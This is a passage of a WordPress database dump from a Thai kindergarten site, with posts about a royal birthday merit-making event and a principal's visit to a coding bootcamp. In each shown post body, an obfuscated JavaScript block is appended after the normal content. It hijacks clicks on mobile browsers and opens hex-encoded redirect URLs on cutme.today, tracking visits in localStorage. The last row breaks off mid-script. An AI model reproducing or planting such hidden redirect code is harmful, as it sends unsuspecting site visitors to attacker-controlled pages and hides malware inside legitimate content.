(113,1,'2024-07-29 18:46:36','2024-07-29 11:46:36','','451759934_122163852500202781_3168910256563112673_n','','inherit','open','closed','','451759934_122163852500202781_3168910256563112673_n','','','2024-07-29 18:46:36','2024-07-29 11:46:36','',112,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/451759934_122163852500202781_3168910256563112673_n.jpg',0,'attachment','image/jpeg',0),
(114,1,'2024-07-29 18:46:46','2024-07-29 11:46:46','<!-- wp:generateblocks/image {\"uniqueId\":\"5d450463\",\"mediaId\":113,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5d450463\"><img class=\"gb-image gb-image-5d450463\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451759934_122163852500202781_3168910256563112673_n.jpg\" alt=\"\" title=\"451759934_122163852500202781_3168910256563112673_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ๒ ขอเชิญร่วมทำบุญ ตักบาตรข้าวสารอาหารแห้ง ปล่อยปลา เปิดถนนเฉลิมพระเกียรติ เนื่องในโอกาสมหามงคลเฉลิมพระชนมพรรษาครบ ๖ รอบ ๒๘ กรกฎาคม ๒๕๖๗ ณ โรงเรียนอนุบาลวัดพระโต ๒','','inherit','closed','closed','','112-revision-v1','','','2024-07-29 18:46:46','2024-07-29 11:46:46','',112,'http://watprato.ssk.in.th/?p=114',0,'revision','',0),
(116,1,'2024-07-29 18:49:14','2024-07-29 11:49:14','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02SwmW3aFVU1Q4nDmbaoZuJD1HnH9QbVWUmAdGaCwgH654rWzQCoGYB9zXqf73ssual%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"808\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต ได้เยี่ยมชมและให้กำลังนักเรียนและครูผู้เข้าร่วมกิจกรรม Coding Bootcamp &amp; Roadshow ภาคอีสานตอนล่าง ณ จังหวัดอุบลราชธานี','','publish','open','open','','%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c%e0%b8%87%e0%b8%b2%e0%b8%a1-%e0%b8%9c%e0%b8%b9','','','2024-07-29 18:49:16','2024-07-29 11:49:16','',0,'http://watprato.ssk.in.th/?p=116',0,'post','',0),
(117,1,'2024-07-29 18:49:07','2024-07-29 11:49:07','','450947325_122163136760202781_4207734148389241137_n','','inherit','open','closed','','450947325_122163136760202781_4207734148389241137_n','','','2024-07-29 18:49:07','2024-07-29 11:49:07','',116,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/450947325_122163136760202781_4207734148389241137_n.jpg',0,'attachment','image/jpeg',0),
(118,1,'2024-07-29 18:49:14','2024-07-29 11:49:14','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02SwmW3aFVU1Q4nDmbaoZuJD1HnH9QbVWUmAdGaCwgH654rWzQCoGYB9zXqf73ssual%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"808\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 